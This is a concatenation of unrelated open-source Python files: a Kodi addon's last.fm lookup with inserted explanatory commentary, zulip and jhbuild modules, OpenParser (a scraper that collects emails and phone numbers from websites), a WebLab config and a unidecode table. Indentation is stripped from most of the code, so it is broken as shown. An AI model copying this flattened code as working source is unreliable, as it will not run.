log("Artist Banner - %s" % _artist_banner, xbmc.LOGDEBUG)
log("Artist Thumb - %s" % _artist_thumb, xbmc.LOGDEBUG)
if _artist_thumb in ("", "null", None):
log("No artist thumb found for %s" % searchartist, xbmc.LOGDEBUG)
_artist_thumb = None
if _artist_banner in ("", "null", None):
log("No artist banner found for %s" % searchartist, xbmc.LOGDEBUG)
_artist_banner = None
if searchartist not in dict4:
dict4[searchartist] = _artist_thumb
if searchartist not in dict5:
dict5[searchartist] = _artist_banner
try:
chop = searching['artists'][0]['strArtistLogo']
if (chop == "") or (chop == "null"):
log("No logo found on tadb", xbmc.LOGDEBUG)
chop = None
except:
log("No logo data found", xbmc.LOGDEBUG)
chop = None
pass
try:
check_mbid = searching['artists'][0]['strMusicBrainzID']
if (mbid != check_mbid) and (check_mbid != 'null'):
log("Updated mbid from [%s] to [%s]" %(mbid, check_mbid), xbmc.LOGDEBUG)
mbid = check_mbid
except:
log("Unable to check mbid", xbmc.LOGDEBUG)
pass
return artist, chop, dict4, dict5, mbid
except Exception as e:
log("[Parse_Data] error [%s]" %str(e), xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)),xbmc.LOGERROR)
return artist, None, dict4, dict5, mbid
def get_lastfm_info(lastfm_username):
"""
Looks up the currently playing track on BBC Radio (1:2) on last.fm as the BBC scrobble their tracks to it
Always returns a single artist name with any featured artists appended to the track name
"""
lastfmurl = "http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks&user=%s" % lastfm_username
lastfmurl = lastfmurl +"&api_key=%s" % happy_hippo.decode( 'base64' )
lastfmurl = lastfmurl + "&format=json&limit=1"
try:
_featuredartists = []
response = load_url(lastfmurl)
stuff = _json.loads(response)
if 'message' in stuff:
log("Error getting data from last.fm", xbmc.LOGERROR)
log("%s" %str(stuff), xbmc.LOGERROR)
return ''
track = stuff['recenttracks']['track'][0]['name']
artist = stuff['recenttracks']['track'][0]['artist']['#text']
if 'feat. ' in track: # got at least one featured artist
_f=track.find('feat.') # remove the () around featured artist(s)
_s=track.rfind(')')
temptrack=track[:_f-2]
temptrack2=track[_f:_s]
track = temptrack + " " + temptrack2
track=track.replace('feat.','~').replace(' & ',' ~ ')
_featuredartists=track.split('~')
track=_featuredartists[0].strip()
del _featuredartists[0]
artist=artist.replace(', ',' & ')
for _artists in range(0,len(_featuredartists)):
artist = artist + " & " + _featuredartists[_artists].strip()
# log("last.fm INFO - GOT [%s] - [%s]" %(track, artist), xbmc.LOGINFO)
if isinstance(artist, str):
artist = artist.decode('utf-8')
if isinstance(track, str):
track = track.decode('utf-8')
return track + ' - ' + artist
except Exception as e:
log("[get_lastfm_info] error [%s] " %str(e), xbmc.LOGERROR)
return ''
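The featured-artist munging above is fiddly string surgery; here is a standalone sketch of just that transformation, separated from the last.fm request (the sample track and artist strings are made up for illustration):

```python
def split_featured(track, artist):
    # Mirrors the string surgery in get_lastfm_info above:
    # strip the "(feat. ...)" part from the track and append the
    # featured artists to the artist name instead.
    featured = []
    if 'feat. ' in track:
        f = track.find('feat.')   # '(' sits at f-1, so slice up to f-2
        s = track.rfind(')')
        track = track[:f - 2] + " " + track[f:s]
        track = track.replace('feat.', '~').replace(' & ', ' ~ ')
        featured = track.split('~')
        track = featured.pop(0).strip()
        artist = artist.replace(', ', ' & ')
        for name in featured:
            artist = artist + " & " + name.strip()
    return track, artist

print(split_featured("Umbrella (feat. Jay-Z)", "Rihanna"))
# -> ('Umbrella', 'Rihanna & Jay-Z')
```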
def get_cached_info(mbid, testpath, local_logo, searchartist, dict4, dict5):
log("Testpath is [%s]" % testpath)
cache_path = logostring + mbid + '/'
log("Cache path is [%s]" %cache_path)
logopath = None
if not local_logo:
logopath = check_cached_logo(cache_path, None)
if searchartist in dict4:
return logopath, dict4[searchartist], dict5[searchartist]
else:
return logopath, None, None
def get_remaining_cache(artist, track, dict1, dict2, dict7):
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
albumtitle = dict1.get(keydata)
albumyear = dict2.get(keydata)
trackinfo = dict7.get(keydata)
return True, albumtitle, albumyear, trackinfo
def split_artists(artist):
if artist.lower() == 'y&t':
return 'y & t'
searchartist = artist.replace(' feat. ', ' ~ ').replace(' ft. ', ' ~ ').replace(' Ft. ', ' ~ ').replace(' feat ', ' ~ ').replace(' ft ', ' ~ ').replace(' Feat ', ' ~ ').replace(' Feat. ', ' ~ ')
searchartist = searchartist.replace(' & ', ' ~ ').replace(' and ', ' ~ ').replace(' And ', ' ~ ').replace(' ~ the ', ' and the ').replace(' ~ The ',
' and The ').replace(' , ', ' ~ ')
searchartist = searchartist.replace(' vs ', ' ~ ').replace(', ', ' ~ ')
return searchartist
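`split_artists` normalises the many "featuring"/"and" spellings to a single `~` separator, while the `' ~ the '` replacement undoes the split for band names like "… and the …". A self-contained copy for illustration:

```python
def split_artists(artist):
    # Copy of the routine above, shown with example inputs.
    if artist.lower() == 'y&t':
        return 'y & t'
    searchartist = artist.replace(' feat. ', ' ~ ').replace(' ft. ', ' ~ ').replace(' Ft. ', ' ~ ').replace(' feat ', ' ~ ').replace(' ft ', ' ~ ').replace(' Feat ', ' ~ ').replace(' Feat. ', ' ~ ')
    searchartist = searchartist.replace(' & ', ' ~ ').replace(' and ', ' ~ ').replace(' And ', ' ~ ').replace(' ~ the ', ' and the ').replace(' ~ The ', ' and The ').replace(' , ', ' ~ ')
    searchartist = searchartist.replace(' vs ', ' ~ ').replace(', ', ' ~ ')
    return searchartist

print(split_artists("Jay-Z ft. Alicia Keys"))   # -> Jay-Z ~ Alicia Keys
print(split_artists("Florence & the Machine"))  # -> Florence and the Machine
```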
def slice_string(string1, string2, n):
if string2 == "" or string2 is None:
return -1
start = string1.find(string2)
while start >= 0 and n > 1:
start = string1.find(string2, start + len(string2))
n -= 1
return start
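`slice_string` returns the start index of the *n*-th occurrence (1-based) of `string2` inside `string1`, or -1 if `string2` is empty, missing, or occurs fewer than *n* times before the search runs out. A standalone sketch:

```python
def slice_string(string1, string2, n):
    """Index of the n-th (1-based) occurrence of string2 in string1, or -1."""
    if string2 == "" or string2 is None:
        return -1
    start = string1.find(string2)
    while start >= 0 and n > 1:
        # continue searching after the previous hit
        start = string1.find(string2, start + len(string2))
        n -= 1
    return start

print(slice_string("ab-cd-ef", "-", 2))  # -> 5
```

Note that because the search advances by `len(string2)`, overlapping occurrences are not counted.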
def set_timer(delay):
cs = datetime.datetime.now().time().second
et = cs + delay
if et >= 60:
et -= 60
return et
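`set_timer` schedules relative to the current wall-clock second and wraps past 60. The wrap logic, isolated from the clock read so it can be tested deterministically (like the original, this only handles delays under 60 seconds):

```python
def target_second(current_second, delay):
    # Same wrap-around as set_timer above, with the clock read passed in.
    et = current_second + delay
    if et >= 60:
        et -= 60
    return et

print(target_second(50, 15))  # -> 5
```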
class RepeatedTimer(object):
"""Auto-starting threaded timer. Used for auto-saving the dictionary data
to file every 15 minutes while the addon is running.
Call as follows :-
rt = RepeatingTimer(interval in secs, function name to call, params for function called)
"""
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
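A minimal, self-contained sketch of how the auto-restarting timer above can be exercised. The class is reproduced so the example runs on its own; the only deviation from the original is the `daemon` flag, added so the demo exits cleanly, and the 0.05 s interval and `ticks` callback are illustrative only:

```python
from threading import Timer
import time

class RepeatedTimer(object):
    """Auto-starting threaded timer, mirroring the class above."""
    def __init__(self, interval, function, *args, **kwargs):
        self._timer = None
        self.interval = interval
        self.function = function
        self.args = args
        self.kwargs = kwargs
        self.is_running = False
        self.start()

    def _run(self):
        self.is_running = False
        self.start()  # re-arm before running the callback
        self.function(*self.args, **self.kwargs)

    def start(self):
        if not self.is_running:
            self._timer = Timer(self.interval, self._run)
            self._timer.daemon = True  # deviation: don't block interpreter exit
            self._timer.start()
            self.is_running = True

    def stop(self):
        self._timer.cancel()
        self.is_running = False

ticks = []
rt = RepeatedTimer(0.05, lambda: ticks.append(1))  # starts immediately
time.sleep(0.35)
rt.stop()
# the callback fired several times while we slept
```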
| gpl-3.0 |
esander91/zulip | zerver/lib/narrow.py | 123 | 1633 | from zerver.decorator import JsonableError
def check_supported_events_narrow_filter(narrow):
for element in narrow:
operator = element[0]
if operator not in ["stream", "topic", "sender", "is"]:
raise JsonableError("Operator %s not supported." % (operator,))
def build_narrow_filter(narrow):
check_supported_events_narrow_filter(narrow)
def narrow_filter(event):
message = event["message"]
flags = event["flags"]
for element in narrow:
operator = element[0]
operand = element[1]
if operator == "stream":
if message["type"] != "stream":
return False
if operand.lower() != message["display_recipient"].lower():
return False
elif operator == "topic":
if message["type"] != "stream":
return False
if operand.lower() != message["subject"].lower():
return False
elif operator == "sender":
if operand.lower() != message["sender_email"].lower():
return False
elif operator == "is" and operand == "private":
if message["type"] != "private":
return False
elif operator == "is" and operand in ["starred"]:
if operand not in flags:
return False
elif operator == "is" and operand in ["alerted", "mentioned"]:
if "mentioned" not in flags:
return False
return True
return narrow_filter
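A trimmed-down, self-contained sketch of the closure pattern above, covering only the `stream` and `is:private` operators (the event dicts and the `build_stream_filter` name are illustrative, not part of the module):

```python
def build_stream_filter(narrow):
    # Simplified version of build_narrow_filter: no flags handling,
    # only the "stream" and "is" operators.
    def narrow_filter(event):
        message = event["message"]
        for operator, operand in narrow:
            if operator == "stream":
                if message["type"] != "stream":
                    return False
                if operand.lower() != message["display_recipient"].lower():
                    return False
            elif operator == "is" and operand == "private":
                if message["type"] != "private":
                    return False
        return True
    return narrow_filter

f = build_stream_filter([["stream", "Engineering"]])
print(f({"message": {"type": "stream", "display_recipient": "engineering"}}))  # True
print(f({"message": {"type": "private"}}))                                     # False
```

Returning the inner function gives a reusable predicate that can be applied to each incoming event.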
| apache-2.0 |
bboozzoo/jhbuild | jhbuild/modtypes/waf.py | 5 | 6424 | # jhbuild - a tool to ease building collections of source packages
# Copyright (C) 2001-2006 James Henstridge
# Copyright (C) 2007 Gustavo Carneiro
# Copyright (C) 2008 Frederic Peters
#
# waf.py: waf module type definitions.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
__metaclass__ = type
import os
import re
from jhbuild.errors import FatalError, BuildStateError, CommandError
from jhbuild.modtypes import \
Package, DownloadableModule, register_module_type
from jhbuild.commands.sanitycheck import inpath
__all__ = [ 'WafModule' ]
class WafModule(Package, DownloadableModule):
'''Base type for modules that are distributed with a WAF script.'''
type = 'waf'
PHASE_CHECKOUT = DownloadableModule.PHASE_CHECKOUT
PHASE_FORCE_CHECKOUT = DownloadableModule.PHASE_FORCE_CHECKOUT
PHASE_CLEAN = 'clean'
PHASE_CONFIGURE = 'configure'
PHASE_BUILD = 'build'
PHASE_CHECK = 'check'
PHASE_DIST = 'dist'
PHASE_INSTALL = 'install'
def __init__(self, name, branch=None, waf_cmd='./waf', python_cmd='python'):
Package.__init__(self, name, branch=branch)
self.waf_cmd = waf_cmd
self.python_cmd = python_cmd
self.supports_install_destdir = True
def get_srcdir(self, buildscript):
return self.branch.srcdir
def get_builddir(self, buildscript):
return self.get_srcdir(buildscript)
def skip_configure(self, buildscript, last_phase):
# don't skip this stage if we got here from one of the
# following phases:
if last_phase in [self.PHASE_FORCE_CHECKOUT,
self.PHASE_CLEAN,
self.PHASE_BUILD,
self.PHASE_INSTALL]:
return False
# skip if the .lock-wscript file exists and we don't have the
# alwaysautogen flag turned on:
builddir = self.get_builddir(buildscript)
return (os.path.exists(os.path.join(builddir, '.lock-wscript')) and
not buildscript.config.alwaysautogen)
def do_configure(self, buildscript):
builddir = self.get_builddir(buildscript)
buildscript.set_action(_('Configuring'), self)
if buildscript.config.buildroot and not os.path.exists(builddir):
os.makedirs(builddir)
cmd = [self.waf_cmd, 'configure', '--prefix', buildscript.config.prefix]
buildscript.execute(cmd, cwd=builddir, extra_env={'PYTHON': self.python_cmd})
do_configure.depends = [PHASE_CHECKOUT]
do_configure.error_phases = [PHASE_FORCE_CHECKOUT]
def do_clean(self, buildscript):
buildscript.set_action(_('Cleaning'), self)
cmd = [self.waf_cmd, 'clean']
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
do_clean.depends = [PHASE_CONFIGURE]
do_clean.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def do_build(self, buildscript):
buildscript.set_action(_('Building'), self)
cmd = [self.waf_cmd, 'build']
if self.supports_parallel_build:
cmd.append('-j')
cmd.append('%s' % (buildscript.config.jobs, ))
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
do_build.depends = [PHASE_CONFIGURE]
do_build.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def skip_check(self, buildscript, last_phase):
if self.name in buildscript.config.module_makecheck:
return not buildscript.config.module_makecheck[self.name]
if 'check' not in buildscript.config.build_targets:
return True
return False
def do_check(self, buildscript):
buildscript.set_action(_('Checking'), self)
cmd = [self.waf_cmd, 'check']
try:
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
except CommandError:
if not buildscript.config.makecheck_advisory:
raise
do_check.depends = [PHASE_BUILD]
do_check.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def do_dist(self, buildscript):
buildscript.set_action(_('Creating tarball for'), self)
if buildscript.config.makedistcheck:
cmd = [self.waf_cmd, 'distcheck']
else:
cmd = [self.waf_cmd, 'dist']
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
do_dist.depends = [PHASE_BUILD]
do_dist.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def do_install(self, buildscript):
buildscript.set_action(_('Installing'), self)
destdir = self.prepare_installroot(buildscript)
cmd = [self.waf_cmd, 'install', '--destdir', destdir]
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
self.process_install(buildscript, self.get_revision())
do_install.depends = [PHASE_BUILD]
def xml_tag_and_attrs(self):
return 'waf', [('id', 'name', None),
('waf-command', 'waf_cmd', 'waf')]
def parse_waf(node, config, uri, repositories, default_repo):
instance = WafModule.parse_from_xml(node, config, uri, repositories, default_repo)
if node.hasAttribute('waf-command'):
instance.waf_cmd = node.getAttribute('waf-command')
if node.hasAttribute('python-command'):
instance.python_cmd = node.getAttribute('python-command')
return instance
register_module_type('waf', parse_waf)
| gpl-2.0 |
torch1/OpenParser | openparser/parse.py | 1 | 8551 | from bs4 import BeautifulSoup
import bs4
import requests
import re
import sys
import json
from urlparse import urljoin, urlparse
from Queue import Queue
email_regex = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)")
phone_regex = re.compile(r"(?:(?:\+?1\s*(?:[.-]\s*)?)?(?:\(\s*([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9])\s*\)|([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9]))\s*(?:[.-]\s*)?)?([2-9]1[02-9]|[2-9][02-9]1|[2-9][02-9]{2})\s*(?:[.-]\s*)?([0-9]{4})(?:\s*(?:#|x\.?|ext\.?|extension)\s*(\d+))?")
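The two patterns above anchor differently: `email_regex` is anchored with `^`/`$` so it only matches a whole string, while `phone_regex` is meant to be scanned with `finditer`/`search` inside longer text. A quick self-contained check (the sample strings are made up):

```python
import re

email_regex = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)")
phone_regex = re.compile(r"(?:(?:\+?1\s*(?:[.-]\s*)?)?(?:\(\s*([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9])\s*\)|([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9]))\s*(?:[.-]\s*)?)?([2-9]1[02-9]|[2-9][02-9]1|[2-9][02-9]{2})\s*(?:[.-]\s*)?([0-9]{4})(?:\s*(?:#|x\.?|ext\.?|extension)\s*(\d+))?")

assert email_regex.match("alice@example.com")
assert not email_regex.match("a string with alice@example.com inside")  # anchored
m = phone_regex.search("call 555-867-5309 today")
assert m and m.group(4) == "5309"  # group 4 captures the last four digits
```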
class Webpage:
def __init__(self, html, url):
self.html = html
self.url = url
def parse(self):
soup = BeautifulSoup(self.html, "lxml")
strings = [string for string in soup.strings]
# find links
_found_links = []
def merge(url):
_found_links.append(url)
return urljoin(self.url, url)
links = [{"url": merge(a['href']), "name": _scrub(a.text) if _scrub(a.text) else a['href']} for a in soup.find_all("a") if a.get('href') is not None and a.get('href') != "#" and not a.get("href").startswith("mailto:") and a.get("href") not in _found_links]
# find social media
social_media = {}
_social_media_sites = ["facebook.com", "youtube.com", "twitter.com", "linkedin.com", "github.com", "plus.google.com", "instagram.com"]
_social_media_urls = []
for link in links:
for site in _social_media_sites:
if site in link['url'].lower() and link['url'] not in _social_media_urls:
if not (site == "twitter.com" and "/intent/" in link['url']):
if site not in social_media:
social_media[site] = []
social_media[site].append(link)
_social_media_urls.append(link['url'])
del _social_media_sites, _social_media_urls
# find description
description = (soup.find('meta', attrs={'name':'og:description'}) or soup.find('meta', attrs={'property':'description'}) or soup.find('meta', attrs={'name':'description'}))
if description is not None:
description = description.get("content")
# find telephone numbers
telephones = []
i = 0
for string in strings:
for match in phone_regex.finditer(string):
extended = _get_desc_phone(strings, i)
number = match.group(0)
if len(match.string) > 100: # or _alpha_ratio(match.string) > 0.4:
break
if ("EIN" in match.string or "EIN" in extended) and ("tax" in match.string or "tax" in extended):
continue
if extended and extended == match.string:
if not len(_alpha(extended.replace(number, "")).strip()) > 0:
extended = None
elif extended.endswith(number):
extended = extended[:-(len(number))].strip()
if match.string is None:
continue
telephones.append({
"number": number,
"extended": extended
})
break
i += 1
# find emails
emails = []
_emails_alone = []
for email in [email for email in soup.find_all("a") if email.get("href") is not None and email.get("href").startswith("mailto:")]:
if email.get('href').startswith("mailto:"):
email_address = email.get("href")[7:]
if not email_address.startswith("?"):
if email_address in _emails_alone:
continue
email_description = email.text + " (" + _get_desc(email, minwords=4, maxlevels=2, doesnt_include=email_regex, repl=email_address) + ")"
emails.append({
"address": email_address,
"extended": _scrub(email_description)
})
_emails_alone.append(email_address)
for string in [s for s in strings if email_regex.match(s)]:
for match in email_regex.finditer(string):
if match.string not in _emails_alone:
_emails_alone.append(match.string)
emails.append({
"address": match.string,
"extended": string
})
del _emails_alone # might as well, save memory
return {
"links": links,
"url": self.url,
"social_media": social_media,
"description": description,
"telephones": telephones,
"emails": emails
}
def _get_desc_phone(strings, i):
extended = strings[i]
if len(re.sub(phone_regex, "", extended).strip()) > 0:
return extended
j = i - 1
while len(extended) < 100:
try:
previous = strings[j]
if not phone_regex.match(previous): # if there is a phone number in the extended text, we are probably outside the relevant boundary
extended = strings[j] + " " + extended
else:
break
except IndexError:
break
j -= 1
extended = _scrub(extended)
if _alpha_ratio(extended) < 0.5:
return strings[i]
return extended
def _get_desc(element, minwords=3, maxlength=140, maxlevels=3, doesnt_include=None, repl=""):
levels = 0
desc = element.getText()
previous = element
while len(desc.split(" ")) <= minwords and levels <= maxlevels:
if previous is None:
break
new_desc = previous.getText(separator=u' ')
if doesnt_include is not None and doesnt_include.match(new_desc.replace(repl, "")):
break
if _alpha_ratio(new_desc) < 0.7:
break
desc = new_desc
if len(previous.parent.text) > len(previous.text)*8:
previous = previous.previousSibling
while isinstance(previous, bs4.element.NavigableString):
previous = previous.previousSibling
else:
previous = previous.parent
levels += 1
if len(desc) > maxlength:
return "..." + desc[-maxlength:]
return desc
def _scrub(string):
string = string.strip()
string = string.replace(" , ", ", ")
string = string.replace("\\n", " ")
if string.startswith(", "):
string = string[2:]
while " " in string:
string = string.replace(" ", " ")
return string.strip()
def webpage_from_url(url):
return Webpage(requests.get(url).text, url)
def _alpha_ratio(string):
only = _alpha(string)
ratio = len(only) / (len(string) + 0.01)
return ratio
def _alpha(string):
only = re.sub(r'\W+', '', string)
return only
# simple alias for constructor
def webpage_from_text(html, url=""):
return Webpage(html, url)
def recursive_parse(url, verbose=False, max_depth=1, local=True):
hostname = urlparse(url).hostname
if verbose:
print "Recursively parsing site with max depth of " + str(max_depth) + " @ " + url
responses = []
queue = Queue()
queue.put((0, url))
seen_urls = []
while queue.qsize() > 0:
level, url = queue.get()
seen_urls.append(url.lower())
if verbose:
print ' ' + (" "*level) + " - " + url
response = webpage_from_url(url).parse()
responses.append(response)
if level + 1 <= max_depth:
for link in response['links']:
href = link['url']
if href.lower() not in seen_urls:
if (not local) or (urlparse(href).hostname == hostname):
queue.put((level + 1, href))
seen_urls.append(href.lower())
return responses
def merge_responses(*responses):
out = {
"links": [],
"social_media": {},
"urls": {},
"telephones": [],
"emails": []
}
_seen_links = []
_seen_emails = []
for response in responses:
for link in response['links']:
# computational complexity: O(n^2) :)
if link['url'] not in _seen_links:
out['links'].append(link)
_seen_links.append(link['url'])
for k,v in response['social_media'].items():
if k not in out['social_media']:
out['social_media'][k] = []
out['social_media'][k].extend(v)
| mit |
ganeshgore/myremolab | server/launch/sample_balanced2_concurrent_experiments/main_machine/lab_and_experiment2/experiment49/server_config.py | 242 | 1525 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
weblab_xilinx_experiment_xilinx_device = 'FPGA'
weblab_xilinx_experiment_port_number = 1
# This should be something like this:
# import os as _os
# xilinx_home = _os.getenv('XILINX_HOME')
# if xilinx_home == None:
# if _os.name == 'nt':
# xilinx_home = r'C:\Program Files\Xilinx'
# elif _os.name == 'posix':
# xilinx_home = r"/home/nctrun/Xilinx"
#
# if _os.name == 'nt':
# xilinx_impact_full_path = [xilinx_home + r'\bin\nt\impact']
# elif _os.name == 'posix':
# xilinx_impact_full_path = [xilinx_home + r'/bin/lin/impact']
# But for testing we are going to fake it:
xilinx_home = "."
xilinx_impact_full_path = ["python","./tests/unit/weblab/experiment/devices/xilinx_impact/fake_impact.py" ]
xilinx_device_to_program = 'XilinxImpact' # 'JTagBlazer', 'DigilentAdept'
xilinx_device_to_send_commands = 'SerialPort' # 'HttpDevice'
digilent_adept_full_path = ["python","./test/unit/weblab/experiment/devices/digilent_adept/fake_digilent_adept.py" ]
digilent_adept_batch_content = """something with the variable $FILE"""
xilinx_http_device_ip_FPGA = "192.168.50.138"
xilinx_http_device_port_FPGA = 80
xilinx_http_device_app_FPGA = ""
xilinx_batch_content_FPGA = """setMode -bs
setCable -port auto
addDevice -position 1 -file $FILE
Program -p 1
exit
"""
# Though it is not really a FPGA, the webcam url var name depends on the device,
# specified above.
fpga_webcam_url = '''https://www.weblab.deusto.es/webcam/fpga0/image.jpg''' | bsd-2-clause |
mrquim/repository.mrquim | script.module.unidecode/lib/unidecode/x08a.py | 253 | 4647 | data = (
'Yan ', # 0x00
'Yan ', # 0x01
'Ding ', # 0x02
'Fu ', # 0x03
'Qiu ', # 0x04
'Qiu ', # 0x05
'Jiao ', # 0x06
'Hong ', # 0x07
'Ji ', # 0x08
'Fan ', # 0x09
'Xun ', # 0x0a
'Diao ', # 0x0b
'Hong ', # 0x0c
'Cha ', # 0x0d
'Tao ', # 0x0e
'Xu ', # 0x0f
'Jie ', # 0x10
'Yi ', # 0x11
'Ren ', # 0x12
'Xun ', # 0x13
'Yin ', # 0x14
'Shan ', # 0x15
'Qi ', # 0x16
'Tuo ', # 0x17
'Ji ', # 0x18
'Xun ', # 0x19
'Yin ', # 0x1a
'E ', # 0x1b
'Fen ', # 0x1c
'Ya ', # 0x1d
'Yao ', # 0x1e
'Song ', # 0x1f
'Shen ', # 0x20
'Yin ', # 0x21
'Xin ', # 0x22
'Jue ', # 0x23
'Xiao ', # 0x24
'Ne ', # 0x25
'Chen ', # 0x26
'You ', # 0x27
'Zhi ', # 0x28
'Xiong ', # 0x29
'Fang ', # 0x2a
'Xin ', # 0x2b
'Chao ', # 0x2c
'She ', # 0x2d
'Xian ', # 0x2e
'Sha ', # 0x2f
'Tun ', # 0x30
'Xu ', # 0x31
'Yi ', # 0x32
'Yi ', # 0x33
'Su ', # 0x34
'Chi ', # 0x35
'He ', # 0x36
'Shen ', # 0x37
'He ', # 0x38
'Xu ', # 0x39
'Zhen ', # 0x3a
'Zhu ', # 0x3b
'Zheng ', # 0x3c
'Gou ', # 0x3d
'Zi ', # 0x3e
'Zi ', # 0x3f
'Zhan ', # 0x40
'Gu ', # 0x41
'Fu ', # 0x42
'Quan ', # 0x43
'Die ', # 0x44
'Ling ', # 0x45
'Di ', # 0x46
'Yang ', # 0x47
'Li ', # 0x48
'Nao ', # 0x49
'Pan ', # 0x4a
'Zhou ', # 0x4b
'Gan ', # 0x4c
'Yi ', # 0x4d
'Ju ', # 0x4e
'Ao ', # 0x4f
'Zha ', # 0x50
'Tuo ', # 0x51
'Yi ', # 0x52
'Qu ', # 0x53
'Zhao ', # 0x54
'Ping ', # 0x55
'Bi ', # 0x56
'Xiong ', # 0x57
'Qu ', # 0x58
'Ba ', # 0x59
'Da ', # 0x5a
'Zu ', # 0x5b
'Tao ', # 0x5c
'Zhu ', # 0x5d
'Ci ', # 0x5e
'Zhe ', # 0x5f
'Yong ', # 0x60
'Xu ', # 0x61
'Xun ', # 0x62
'Yi ', # 0x63
'Huang ', # 0x64
'He ', # 0x65
'Shi ', # 0x66
'Cha ', # 0x67
'Jiao ', # 0x68
'Shi ', # 0x69
'Hen ', # 0x6a
'Cha ', # 0x6b
'Gou ', # 0x6c
'Gui ', # 0x6d
'Quan ', # 0x6e
'Hui ', # 0x6f
'Jie ', # 0x70
'Hua ', # 0x71
'Gai ', # 0x72
'Xiang ', # 0x73
'Wei ', # 0x74
'Shen ', # 0x75
'Chou ', # 0x76
'Tong ', # 0x77
'Mi ', # 0x78
'Zhan ', # 0x79
'Ming ', # 0x7a
'E ', # 0x7b
'Hui ', # 0x7c
'Yan ', # 0x7d
'Xiong ', # 0x7e
'Gua ', # 0x7f
'Er ', # 0x80
'Beng ', # 0x81
'Tiao ', # 0x82
'Chi ', # 0x83
'Lei ', # 0x84
'Zhu ', # 0x85
'Kuang ', # 0x86
'Kua ', # 0x87
'Wu ', # 0x88
'Yu ', # 0x89
'Teng ', # 0x8a
'Ji ', # 0x8b
'Zhi ', # 0x8c
'Ren ', # 0x8d
'Su ', # 0x8e
'Lang ', # 0x8f
'E ', # 0x90
'Kuang ', # 0x91
'E ', # 0x92
'Shi ', # 0x93
'Ting ', # 0x94
'Dan ', # 0x95
'Bo ', # 0x96
'Chan ', # 0x97
'You ', # 0x98
'Heng ', # 0x99
'Qiao ', # 0x9a
'Qin ', # 0x9b
'Shua ', # 0x9c
'An ', # 0x9d
'Yu ', # 0x9e
'Xiao ', # 0x9f
'Cheng ', # 0xa0
'Jie ', # 0xa1
'Xian ', # 0xa2
'Wu ', # 0xa3
'Wu ', # 0xa4
'Gao ', # 0xa5
'Song ', # 0xa6
'Pu ', # 0xa7
'Hui ', # 0xa8
'Jing ', # 0xa9
'Shuo ', # 0xaa
'Zhen ', # 0xab
'Shuo ', # 0xac
'Du ', # 0xad
'Yasashi ', # 0xae
'Chang ', # 0xaf
'Shui ', # 0xb0
'Jie ', # 0xb1
'Ke ', # 0xb2
'Qu ', # 0xb3
'Cong ', # 0xb4
'Xiao ', # 0xb5
'Sui ', # 0xb6
'Wang ', # 0xb7
'Xuan ', # 0xb8
'Fei ', # 0xb9
'Chi ', # 0xba
'Ta ', # 0xbb
'Yi ', # 0xbc
'Na ', # 0xbd
'Yin ', # 0xbe
'Diao ', # 0xbf
'Pi ', # 0xc0
'Chuo ', # 0xc1
'Chan ', # 0xc2
'Chen ', # 0xc3
'Zhun ', # 0xc4
'Ji ', # 0xc5
'Qi ', # 0xc6
'Tan ', # 0xc7
'Zhui ', # 0xc8
'Wei ', # 0xc9
'Ju ', # 0xca
'Qing ', # 0xcb
'Jian ', # 0xcc
'Zheng ', # 0xcd
'Ze ', # 0xce
'Zou ', # 0xcf
'Qian ', # 0xd0
'Zhuo ', # 0xd1
'Liang ', # 0xd2
'Jian ', # 0xd3
'Zhu ', # 0xd4
'Hao ', # 0xd5
'Lun ', # 0xd6
'Shen ', # 0xd7
'Biao ', # 0xd8
'Huai ', # 0xd9
'Pian ', # 0xda
'Yu ', # 0xdb
'Die ', # 0xdc
'Xu ', # 0xdd
'Pian ', # 0xde
'Shi ', # 0xdf
'Xuan ', # 0xe0
'Shi ', # 0xe1
'Hun ', # 0xe2
'Hua ', # 0xe3
'E ', # 0xe4
'Zhong ', # 0xe5
'Di ', # 0xe6
'Xie ', # 0xe7
'Fu ', # 0xe8
'Pu ', # 0xe9
'Ting ', # 0xea
'Jian ', # 0xeb
'Qi ', # 0xec
'Yu ', # 0xed
'Zi ', # 0xee
'Chuan ', # 0xef
'Xi ', # 0xf0
'Hui ', # 0xf1
'Yin ', # 0xf2
'An ', # 0xf3
'Xian ', # 0xf4
'Nan ', # 0xf5
'Chen ', # 0xf6
'Feng ', # 0xf7
'Zhu ', # 0xf8
